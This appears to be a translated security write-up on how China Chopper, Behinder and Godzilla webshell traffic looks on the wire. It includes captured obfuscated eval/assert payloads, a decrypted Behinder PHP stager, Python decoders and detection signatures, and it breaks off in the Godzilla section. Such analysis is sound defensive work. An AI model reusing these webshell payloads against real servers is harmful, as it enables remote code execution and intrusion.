Traffic characteristics of common webshell tools (哥斯拉 Godzilla, 冰蝎 Behinder, 蚁剑 AntSword, 菜刀 China Chopper)




Source of the China Chopper capture: 抓取分析菜刀流量 - BuFFERer - 博客园 (Capturing and analysing China Chopper traffic)

China Chopper (中国菜刀)

```http
POST /niushop-master/shell.php HTTP/1.1
X-Forwarded-For: 141.245.0.248
Referer: http://192.168.48.128/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: 192.168.48.128
Content-Length: 676
Cache-Control: no-cache
Connection: close

ccs=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));
```

`ccs` is the connection password: the name of the POST parameter is the password configured in the client. Three other things stand out in this request: the User-Agent impersonates Baiduspider, the client supplies its own X-Forwarded-For header, and the dangerous keywords are split with PHP string concatenation (`"ass"."ert"`, `"ev"."Al(`) to get past naive keyword matching.

Fixed segment (identical in every request; it is the base64 of the prologue `@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");`): QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

Variable segment (the command the client wants executed): EQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D

URL-decode the body, base64-decode the string passed to `$xx(...)` and format the PHP; the result is:

```php
@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};
echo("X@Y");
$D=dirname(__FILE__);
$R="{$D}\t";
if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}
$R.="\t";
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("X@Y");
die();
```

Two things to read off this: the prologue up to `echo("X@Y")` does not change between requests, and the output of every command is printed between two `X@Y` markers (`print $R;;echo("X@Y");die();`), so the response body starts and ends with `X@Y` as well.
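The decoding steps above, as an added Python example (not code from the original post or from China Chopper): it takes the captured request body shown above, recovers the password and the PHP, flags the indicators visible in the request, and unframes a reply. The headers dict and the reply string are constructed for the demonstration.

```python
"""Decode a China Chopper (中国菜刀) PHP request and its X@Y-framed reply.

Added example, not from the original post. CAPTURED_BODY is the request body
from the capture above; CAPTURED_HEADERS and SAMPLE_REPLY are constructed.
"""
import base64
import re
from urllib.parse import unquote_plus

# Every Chopper PHP request starts with this prologue (the "fixed segment").
CHOPPER_PROLOGUE = '@ini_set("display_errors","0");@set_time_limit(0);'
MARKER = "X@Y"  # the shell prints this before and after the command output

CAPTURED_BODY = r'''ccs=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));'''

CAPTURED_HEADERS = {  # constructed from the header lines of the capture above
    "User-Agent": "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
    "X-Forwarded-For": "141.245.0.248",
    "Content-Type": "application/x-www-form-urlencoded",
}
# Constructed reply: directory, drive list, uname and user between the two markers.
SAMPLE_REPLY = "X@Y/var/www/html/niushop-master\t\tLinux web 5.4.0 #1 SMP x86_64(www-data)X@Y"


def decode_chopper_request(body):
    """Return (password, decoded PHP) or None. The password is the POST parameter name."""
    password, sep, raw_value = body.partition("=")
    if not sep:
        return None
    value = unquote_plus(raw_value)
    # Stager: eval("$xx=\"base64_decode\";@eval($xx('<b64>'))"); pull out the <b64>.
    m = re.search(r"\$xx\('([A-Za-z0-9+/=]+)'\)", value)
    if not m:
        return None
    return password, base64.b64decode(m.group(1)).decode("latin-1")


def chopper_indicators(headers, body):
    """Features a detector can combine; none of them is conclusive on its own."""
    hits = []
    value = unquote_plus(body.partition("=")[2])
    if '"ass"."ert"' in value or '"ev"."al(' in value.lower():
        hits.append("split assert/eval keyword")
    decoded = decode_chopper_request(body)
    if decoded and decoded[1].startswith(CHOPPER_PROLOGUE):
        hits.append("fixed base64 prologue")
    if decoded and 'echo("X@Y")' in decoded[1]:
        hits.append("X@Y output markers")
    if "Baiduspider" in headers.get("User-Agent", ""):
        hits.append("spoofed Baiduspider User-Agent")
    if "X-Forwarded-For" in headers:
        hits.append("client-supplied X-Forwarded-For")
    return hits


def parse_chopper_reply(text):
    """Command output sits between the two X@Y markers; None if the frame is missing."""
    parts = text.split(MARKER)
    return parts[1] if len(parts) >= 3 else None


if __name__ == "__main__":
    print(decode_chopper_request(CAPTURED_BODY))
    print(chopper_indicators(CAPTURED_HEADERS, CAPTURED_BODY))
    print(repr(parse_chopper_reply(SAMPLE_REPLY)))
```

The parameter name is taken as the password because that is how the client encodes it; the base64 is pulled from the `$xx('...')` call rather than from a fixed offset, so the same function works for both the first (`X@Y`-framed system info) request and later command requests.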

Behinder (冰蝎): analysis of the first request and response

Header: `Accept: application/json, text/javascript, */*; q=0.01`. Content type: `Content-type: Application/x-www-form-urlencoded`. Detection idea: the client will accept any type but prefers application/json and text/javascript. The Content-type field is a weak feature and should only support other features in detection.

Traffic analysis:

```http
POST /niushop-master/upload/avator/1685262585.php HTTP/1.1
Host: 192.168.48.128
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.48.128/niushop-master/FY/5/1685262585.php
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Content-Length: 3544
Connection: close
Accept-Encoding: gzip, deflate

3Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykV6TAqM+Dre2VvJgtpczzMwZtv6+8OHrSLvL4oWNLMbzMwXBHmN04huuMASENwg8K5td2+hpA9Rc5ajXcjDD2b4ESg0Am3lvX8WdQuOuLjJ7/xJV40R+CBpX/BHbkSPJUhwHd9OBxDGxJhZ1utdvVOzYww92oq9SNOG+drg2kXUg80UkH5InkBIQkwwlzIrmbN7FKr/QcPZ7o1G5CHhBgT9zZPzIrAKE7yjrae7QJKb9slAm2f6VRBufxArCf3Et25NNh628QE5lUPsytONYg01wLZEb8czamXXV4KGhGebkETw53A5H17UVoXSi9d1GeRmPvqFaUBY3U491P4Wx8PrKkoAaPYR+BaDdobwneEgDHSJsRB3Kj51m85MI0vZMmtr+YBxYbKakUh+2thB+xDwypYFnsocQiA4bl0mbJ1g1DAW4ttpY88geykdSlUmLRr1C9mquqoZ/tOJxh6+j8m/qG0F38LDlo1J69kLBFbrr2KqDG6ONSMb1LUnIrqxPtwwcGqPnSVFKrFh1pb2gpia+9F8rbUiaOr08aW3sGdRit9jK2tkLtGjvieX0/sURC/wzHk/H/AQJ/OsQEkMFEYiZ80rKim4iAysVE21BkM09UKHXTUoehsji3PPfLcWty6pL3X/C7rc3K4/JTuirfvNXhbmR0CnI77Giy6MZ2yK7luUoXZeCIA3CEEFuHeQkvSj+cx8Ncb/AvNrLR++g+qL0fmZArD1A14K63P2WALeOQFtzo6MgTDXJGu9rpQceeZS1lJhFn1yO9XvhxiIx4qGC/Dv0HVlOdTopebq77ZDyKm2LzqgCJW4NcoH3yAkd5OisOwMPuVXsbNmAnavF49HLqGnadtJKrqN5VEo6ITmxq/V5sVxMU/d5e5h26CoHEN3UtzFohaGbLqrQegbanaHgaCmY+99rOb7ywPsWvCNwx8OVPJD37dABUZND/WxkJUePtgYW3tcrnLsteJM2ODcZ+hF+ecwOw/ovHha1vyFTQgTs1z37uNoCWW/rnoGdEGjLPjnF0vv0OGChnL9xCHdemTMLGBBLz5oTndcS3S8y72cj9fGBtKTuIZQV2kyjVZmpC5LaQWz5wzrZrOvt0Ao25AApwh6QkJVA4ayiY8Ta0nGgPZy7/3Fk+1iz+UddjUa5or/fAgayyoGNV1lNPraKWn86xhOkqPcYQJHoFVRF6xf20/V7kz3ZQKbWYDQ7nqMio/aq77aTB4V1/KhX0AWSGf4ubwrLod7guJGtTrWMIOAOLDoPd9pFlCCbwbAk0/F1b1HYdcQTiDf7tvpPBTheUKiI6lGCg103SXJ5ujMdG2LkMStIfrCU3daSxvTfrq4oOhIuBdvGRFVgYVxgATaJO0CNysmiYGalYP5vjcR63uVe4++ZBgns8TGL+nNOg2oaNZqeRQglEPMw8fnho4nNY0/bsNmOYRqaae6zTImybEFOJbZbag+iNyn8boRaE/XDJQypDD8WI/3uzc4YenUkDmqBacjZWOkcVszWSdJWpgaM0uhpcSGoY21V38Hgz4R06kDEYqVhK/QN97wxtPUQTnJ6Pg8L8nk9qOK0heNZsUKOP5QM6Rc+AZXJuPimtnnO0y7d/sd0yh56TbSt54aE1Lq1/k24lmcqEJZXfV5TChT2e4/7vDTPhO3m57TiZAgzPVXOMejH7zbl3yThYSoSex4eJLeuVEHwsnSvYLOB6Yh9tORwR4m5F1JrDZ8sRU4Y+Q7xqk18aRDtrzcazvqPawEP6aRWos7a/kXGROEB3SmUYT2p22E6m7Lzx6BMoyF3R9d0dP1Jp4HPxf7hrr6o6VUsEuhMvbkSVx3tdR8KCWR+FCspzeZUAGn4siKPGPOpznXcpc/AIdiSM8uoJI7hZ+gigbbw10+wduey035MaOhbRCJ5GjDtxVv9B1pc5bfQ6bsHY8VtGy48Lx/pCIfqZTI/lp/bf7eku6kpkkVTpTit+PIfU1KnkFBtEmoxZGE9qzAdVWy0Q6Xct3WEGdB00HEJtxUQVh8+4KP3PaHRBeDkCZl7FS6aZ+na+LPCB90ZJq0xla9UKVYuGThYS+4Fb2kW4f7crzEz15JrfjIQPG4lpQu1J61U5cWcRtiYUeLfvcF5EIxjhyeMMTAPHSb/wXQjWfwfN7ydEdrzMZcNsUAjLhym92hV+wjZMcO2JO78HW0qPuTXlSENJbs/1j8y6Eyo5h5BvVBAJ+95KXqw50LAeXZq5n1nBkq0UbqnYgH8GswqAUgjbjPNsY1wDGRT9HFV2PtOVV3MAQ4Vdxj3zcq5xE55USGWkBgPltCdxsHKkX/tce5YAmAUeC9hhCJvQr3vLTyI7qsaDimaS6v31PXvgqFf8nzUMcf9aVjsplDdehL0nKo/7zWXQfoaPQW32Ysc6cznKGH7FabTxA/+MBm4i5ASgvOAGMkV+AE729evVKchqHB7CEG+kLygE9MrXRZB4DE4B/BNnhNYnpckmoLHsH09I02/e6gi3qCtINyNEc8+RIfNkrrrchm+pvFgq0yfB35ARlS+vgohsD0KvBQiPF+dEco2Ez1yoI7qD9lE55hnias2bQkmJPWO4C26yGdKrzmE0jiFeM54/lcAIuzRyxUElh5pgKyw4Gh++RU86BhIFffI4ziJ8FNFdv0utVd827wpkqlNPx28hixXmZAn+kFqBu83b7VAdpwTandcVFA6A1PLpcAvxPBZuOOv8HXgVSTK26IOuZhHXa2agc9uVrpOP90LvJ4IuZeKoI2SWNY7UpjxfU7PviwV+AoywVCVRljemM/lmTXeCBytcBHH5guFIgIyt7XH6j3NIznouKG/KDoVPJs9Hk9kWA2aRqvEivQrLxAOZYygJ9nHlYr2BNGAwRIHAT4FsenN57/dLFpMZq/RIGVd3uzWJqAVaksKQK3faEqwlGR5CTPCH47O/3QzlE32tvKwWze6RmGa19UGXV76FopsREWhyhSsnPBhyvrzttLOy2n6D56XplkmzqfV0CMoQkQxv96fhIELjbFKVWAoZ90aLAWeHSHZ5aGyo6Pyhkrx6h4UetAzfJnF++8jwsapnyoouL3tfxX2AjQPuQ3appLJk/yTL9pw1WVlOwtgCJQaShAF/QbjTvmHNtHJXbiadCTyS0I2J/FjXWANQJemJnDv10amF/RA7arvJXo7kpkp0Y/8lfxuW+3H3iQpWPYzqRwJ1GpAkajjOsahoqlhu+JiMHx7YKAw==
```


AES-decrypt the body with the key, which is the first 16 characters of the md5 of the connection password, here `e45e329feb5d925b`. The result:

```php
assert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIG1haW4oJGNvbnRlbnQpDQp7DQoJJHJlc3VsdCA9IGFycmF5KCk7DQoJJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKCRjb250ZW50KTsNCiAgICBAc2Vzc2lvbl9zdGFydCgpOyAgLy/liJ3lp4vljJZzZXNzaW9u77yM6YG/5YWNY29ubmVjdOS5i+WQjuebtOaOpWJhY2tncm91bmTvvIzlkI7nu61nZXRyZXN1bHTml6Dms5Xojrflj5Zjb29raWUNCg0KICAgIGVjaG8gZW5jcnlwdChqc29uX2VuY29kZSgkcmVzdWx0KSk7DQp9DQoKZnVuY3Rpb24gRW5jcnlwdCgkZGF0YSkKewogQHNlc3Npb25fc3RhcnQoKTsKICAgICRrZXkgPSAkX1NFU1NJT05bJ2snXTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCdvcGVuc3NsJykpCiAgICAJewogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsKICAgIAkJCSAkZGF0YVskaV0gPSAkZGF0YVskaV1eJGtleVskaSsxJjE1XTsKICAgIAkJCX0KCQkJcmV0dXJuICRkYXRhOwogICAgCX0KICAgIGVsc2UKICAgIAl7CiAgICAJCXJldHVybiBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJBRVMxMjgiLCAka2V5KTsKICAgIAl9Cn0KJGNvbnRlbnQ9ImFtaG9VbFJQV2pZeVMzZHVjalJyWmxSSlJ6aFhNRGRVYzJsYVlUVlhUazlrVW5Gak1qVmFUV05ZWW5wYVJHZEliMVZJTkdJd2FVMXpVVUZDU21oWVdFbzNWMkp1VDFSbVFtbDRORWc1UXpjeE1rVmFWRVpKZFVSMU5HTTRRMHhDWjBGRVoydHdRMDR6UWxONVJYaHlTRzFVUldWTGVXOXdRM1pUWjNsaWFtUnNZVzkzZVVabk1GZ3dhRmR6UldGVmVUTXliazlqYms5VFoyRnBUV3d6Y1RVMlkzWldTV3A2VURRd1NVYzJkbEpTU20xRGVESmtRV05FTkhFMFdFcEhiRnBFVGs1clNHeFBRMUo1VFUxTFF6UXphWFIwZVVkMlZtWkthVGxHU1ZWbmVEVk5aek5oU2tsMVNFNU5TV0ZsV0ZaaFRUTXpWakk0YVdKdVdHWkJTMHAzV21kTFJtOUJUbU5xYkZBd2RXRTBabXcyWkhGRU9FMU5aRUpPUVV0dVVYSTNhM0JzY1RZMGNWQkVkbU5DT0ZOTmFqTk1abE5ZVjNoVmVHVlhjRzkyVDBwUVdqVlZjVVJ1VUhaS2JXeHdaRzFoY2taNFQwMURVMWxDVlVsaU5XeGtUWFIzYVhaa2ExZzBTVUpTUlUwelNIRldkMk0xTUZwUWFtaEdTalYwVjJVemFYTTFaVmh2VkVzelVGUktkMEpFTVZCcmFqVm5PVXRTTUd4SGRqZG9VR3RQUWxWWVlVRkViVEUzZW1KeFJVdGthMGh2VTNVM09VNDJWMnR3UzFsVGJuQjRZVkJtT0doaWJUVkxTVVZ2VW05TGVtYzVOWFJsWmtSclVERmlUMUkyUVVoU1RVTm5NbkJYT1hCTFFXaHlabTQyVDBwNWFUZzNWSFpMU0VOaU1VTkJZbUpqTTNwYVMwZFZNMkZJUXpKYU9UVnhVM0pLUjNKc1l6aElVa05CWVc0eWNXWnRNV2RIUTNsbGJtc3hURGRsZDNKM04wWkZXa0puUkV0V1EyVTJiMnRGUmtSdlFYTmpVMjVvY1hGS1Z6VXlaV2hwYWxwa2FHeHBkbE0yU2xoTFMwRnZlVnBhYjNnMlNGQmplWFZTZURoalZIaE5aME5WV1c0eFQyNWliRkZIYzJRNWEyazBNV3RzWlZWcWJHdHhPRzFqTjI0emMydDVaR2RZVDFoSFJYUTNkRTlsZEZVMFZIcExZazFRUVhOMk1saEtZbmhLZG5CUE5tRlRhbTVyZDFOUVZGWk9jMGx5YjJ3eFJEUXhNWEU1WTNWbVozVk9RVUZHUVRCWWEwTkdkek5qY1ROdFVVdzBTVkJ6Tm5CSVNtc3lUVEpVUm5JNVMydGpUR0kwZEZORlRtSmtablpWWTFwbGIwbHNSbEo1Vld0cGRHZzBkVkZYUzJkS1RXeHlTSFZGY1U1SWRrZGxTWFJSTlZKNGFrcDVOR3BwYkU1eWNISk5OVlpCV25FNGRrVmhVbkZYWW1WVmJYSk1SRTlOYlZaRVRGVm9PRXR2Um1SVlVqWkNNM1JqUjBWcFdsUnlSRGRSU0c0MVFsTldNbEJEVEZsc09XaHBkbUpUY0dsdmRWTmFZWGgxUVdFMVQwWk5ZMkpKWkhsaVFqYzBZWGcwYjNWMWVuZGthM2hwZVhnNU5XVTFlV2x6YUV4MlZnPT0iOyRjb250ZW50PWJhc2U2NF9kZWNvZGUoJGNvbnRlbnQpOw0KbWFpbigkY29udGVudCk7'));
```

One more base64 decode gives the PHP that is actually executed:

```php
@error_reporting(0);
function main($content)
{
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    @session_start();  // start the session here, otherwise a connect followed directly by background leaves the later getresult without a cookie

    echo encrypt(json_encode($result));
}

function Encrypt($data)
{
    @session_start();
    $key = $_SESSION['k'];
    if(!extension_loaded('openssl'))
    {
        for($i=0;$i<strlen($data);$i++) {
            $data[$i] = $data[$i]^$key[$i+1&15];
        }
        return $data;
    }
    else
    {
        return openssl_encrypt($data, "AES128", $key);
    }
}
$content="...";   // long random filler string, elided here; it is the "amhoUlRP..." value in the base64 above
$content=base64_decode($content);
main($content);
```

The name of this variable and its content are generated randomly; the purpose is to vary the Content-Length so that a fixed request length cannot be used as a signature.

Response to the first connect (after decryption and base64 decoding):

{"status":"c3VjY2Vzcw==","msg":"amhoUlRPWjYyS3ducjRrZlRJRzhXMDdUc2laYTVXTk9kUnFjMjVaTWNYYnpaRGdIb1VINGIwaU1zUUFCSmhYWEo3V2JuT1RmQml4NEg5QzcxMkVaVEZJdUR1NGM4Q0xCZ0FEZ2twQ04zQlN5RXhySG1URWVLeW9wQ3ZTZ3liamRsYW93eUZnMFgwaFdzRWFVeTMybk9jbk9TZ2FpTWwzcTU2Y3ZWSWp6UDQwSUc2dlJSSm1DeDJkQWNENHE0WEpHbFpETk5rSGxPQ1J5TU1LQzQzaXR0eUd2VmZKaTlGSVVneDVNZzNhSkl1SE5NSWFlWFZhTTMzVjI4aWJuWGZBS0p3WmdLRm9BTmNqbFAwdWE0Zmw2ZHFEOE1NZEJOQUtuUXI3a3BscTY0cVBEdmNCOFNNajNMZlNYV3hVeGVXcG92T0pQWjVVcURuUHZKbWxwZG1hckZ4T01DU1lCVUliNWxkTXR3aXZka1g0SUJSRU0zSHFWd2M1MFpQamhGSjV0V2UzaXM1ZVhvVEszUFRKd0JEMVBrajVnOUtSMGxHdjdoUGtPQlVYYUFEbTE3emJxRUtka0hvU3U3OU42V2twS1lTbnB4YVBmOGhibTVLSUVvUm9Lemc5NXRlZkRrUDFiT1I2QUhSTUNnMnBXOXBLQWhyZm42T0p5aTg3VHZLSENiMUNBYmJjM3paS0dVM2FIQzJaOTVxU3JKR3JsYzhIUkNBYW4ycWZtMWdHQ3llbmsxTDdld3J3N0ZFWkJnREtWQ2U2b2tFRkRvQXNjU25ocXFKVzUyZWhpalpkaGxpdlM2SlhLS0FveVpab3g2SFBjeXVSeDhjVHhNZ0NVWW4xT25ibFFHc2Q5a2k0MWtsZVVqbGtxOG1jN24zc2t5ZGdYT1hHRXQ3dE9ldFU0VHpLYk1QQXN2MlhKYnhKdnBPNmFTam5rd1NQVFZOc0lyb2wxRDQxMXE5Y3VmZ3VOQUFGQTBYa0NGdzNjcTNtUUw0SVBzNnBISmsyTTJURnI5S2tjTGI0dFNFTmJkZnZVY1plb0lsRlJ5VWtpdGg0dVFXS2dKTWxySHVFcU5IdkdlSXRRNVJ4akp5NGppbE5ycHJNNVZBWnE4dkVhUnFXYmVVbXJMRE9NbVZETFVoOEtvRmRVUjZCM3RjR0VpWlRyRDdRSG41QlNWMlBDTFlsOWhpdmJTcGlvdVNaYXh1QWE1T0ZNY2JJZHliQjc0YXg0b3V1endka3hpeXg5NWU1eWlzaEx2Vg=="}

`"status":"c3VjY2Vzcw=="` base64-decodes to `success`. `msg` is an extremely long string; from the PHP in the Behinder request it is `$content` after base64 and AES, and like the `$content` in the request it exists only to pad the Content-Length. The response pattern `{"status":"success","msg":...}` had already been added to WAF rules for Behinder 2.0, so Behinder 3.0 pads the response with large random data to get past them.

Traffic characteristics

User-Agent: Behinder ships with a pool of 10 User-Agent strings and picks one at random each time it connects to the shell. Detection idea: put `fast_pattern` on the shorter, simpler `content` match so it is tried first, rather than spending time matching the User-Agent; in Snort, pairs of `content:"User-Agent"; content:"<browser version>";` can match each of the ten browsers.

Fixed code in the PHP webshell

Traffic feature: the shell file always contains `$post=Decrypt(file_get_contents("php://input")); eval($post);`. Detection idea: include `eval($post)` as a feature in the `content` match.

Long connections

Traffic feature: Behinder uses persistent connections by default to avoid the overhead of repeated handshakes, so by default both request and response headers carry `Connection: Keep-Alive`. Detection idea: usable as an auxiliary feature. Port feature: when Behinder connects to the webshell, javaw also opens a TCP connection to the target host; each connection uses a local port around 49700, and the port increases by one with every new connection.

Second response packet (AES decrypt, then base64-decode twice)

AES-decrypting and then base64-decoding twice yields an HTML document (shown as a screenshot in the original).
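The Behinder decoding described above (key from the password, AES or XOR body, the `assert|eval(base64_decode(...))` wrapper, the base64 JSON connect reply) and the weak request features from the traffic-characteristics list, as one added Python example that is not code from the original post or from Behinder. Assumptions: the PHP `openssl_encrypt($data, "AES128", $key)` is taken to be AES-128-CBC with a zero IV and PKCS#7 padding, implemented through the optional `cryptography` package; the sample exchange is constructed in the XOR fallback mode so the block runs with the standard library alone, with the password "rebeyond" used only to show the key derivation.

```python
"""Behinder 3 (冰蝎) traffic helpers: key derivation, body decryption, payload
unwrapping, connect-response parsing and weak header indicators.

Added example, not from the original post or from Behinder. It follows the PHP
recovered above: key = md5(password)[:16]; body = base64(AES-128 via openssl
"AES128", assumed here to be CBC with a zero IV and PKCS#7 padding) or, when the
openssl extension is missing, base64 of the XOR fallback $data[$i]^$key[$i+1&15].
The sample exchange below is constructed in XOR mode (no crypto library needed).
"""
import base64
import binascii
import hashlib
import json
import re


def behinder_key(password):
    """Behinder 3 keys the cipher with the first 16 hex chars of md5(password), as raw bytes."""
    return hashlib.md5(password.encode()).hexdigest()[:16].encode()


def xor_transform(data, key):
    """The openssl-less fallback from the shell: $data[$i] ^ $key[$i+1&15]. Symmetric."""
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))


def aes_decrypt(data, key):
    """openssl_decrypt($data, "AES128", $key) equivalent; needs the 'cryptography' package."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.CBC(b"\x00" * 16)).decryptor()
    padded = dec.update(data) + dec.finalize()
    return padded[:-padded[-1]]  # strip PKCS#7 padding


def decrypt_body(b64_body, key, openssl_loaded=True):
    """Undo base64, then AES (openssl path) or XOR (fallback path)."""
    raw = base64.b64decode(b64_body)
    return aes_decrypt(raw, key) if openssl_loaded else xor_transform(raw, key)


PAYLOAD_RE = re.compile(rb"^(assert|eval)\|eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)$")


def unwrap_payload(plaintext):
    """Decrypted request is "<func>|eval(base64_decode('<b64 php>'))"; return (func, php)."""
    m = PAYLOAD_RE.match(plaintext.strip())
    return (m.group(1).decode(), base64.b64decode(m.group(2)).decode()) if m else None


def parse_connect_response(plaintext):
    """Connect reply is JSON with base64 fields: status -> "success", msg -> random filler."""
    obj = json.loads(plaintext)
    return base64.b64decode(obj["status"]).decode(), base64.b64decode(obj["msg"]).decode()


def request_indicators(headers, body):
    """Weak features from the post; combine them, never alert on one alone."""
    hits = []
    if headers.get("Accept") == "application/json, text/javascript, */*; q=0.01":
        hits.append("Behinder Accept header")
    if "Content-type" in headers:  # non-canonical capitalisation of the header name
        hits.append("Content-type header casing")
    if headers.get("Connection", "").lower() == "keep-alive":
        hits.append("long connection")
    try:
        raw = base64.b64decode(body, validate=True)
        if raw and len(raw) % 16 == 0:  # AES block alignment; only holds for the openssl path
            hits.append("base64 body, AES block aligned")
    except binascii.Error:
        pass
    return hits


# --- constructed exchange (password "rebeyond", XOR mode); not captured traffic ---
KEY = behinder_key("rebeyond")
SAMPLE_PHP = '@error_reporting(0);function main($content){echo "ok";}main("x");'
_plain_req = "assert|eval(base64_decode('%s'))" % base64.b64encode(SAMPLE_PHP.encode()).decode()
SAMPLE_REQUEST = base64.b64encode(xor_transform(_plain_req.encode(), KEY)).decode()
_plain_resp = json.dumps({"status": base64.b64encode(b"success").decode(),
                          "msg": base64.b64encode(b"A" * 1024).decode()})
SAMPLE_RESPONSE = base64.b64encode(xor_transform(_plain_resp.encode(), KEY)).decode()
SAMPLE_HEADERS = {"Accept": "application/json, text/javascript, */*; q=0.01",
                  "Content-type": "application/x-www-form-urlencoded",
                  "Connection": "Keep-Alive"}


def decode_sample():
    """Run the constructed request and reply through the decoders."""
    func, php = unwrap_payload(decrypt_body(SAMPLE_REQUEST, KEY, openssl_loaded=False))
    status, msg = parse_connect_response(
        decrypt_body(SAMPLE_RESPONSE, KEY, openssl_loaded=False).decode())
    return func, php, status, len(msg)


if __name__ == "__main__":
    print(KEY, decode_sample(), request_indicators(SAMPLE_HEADERS, SAMPLE_REQUEST))
```

On real captures, pass `openssl_loaded=True` and the key derived from the suspected password; a wrong key shows up as a padding error or as plaintext that `unwrap_payload` rejects, which is itself a cheap way to brute-force a small password list against one captured request.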

Godzilla (哥斯拉)

Reference article: 哥斯拉Godzilla加密流量分析 (Godzilla encrypted traffic analysis)

Godzilla's characteristics: request-packet and response-packet features (shown as a screenshot in the original, not reproduced here).

Decoding the connect packet (default PHP encryptor; the capture is a screenshot in the original). To reverse the message: URL-decode, then reverse the string, then base64-decode. String-reversal script:

```python
def reverse_string(s):
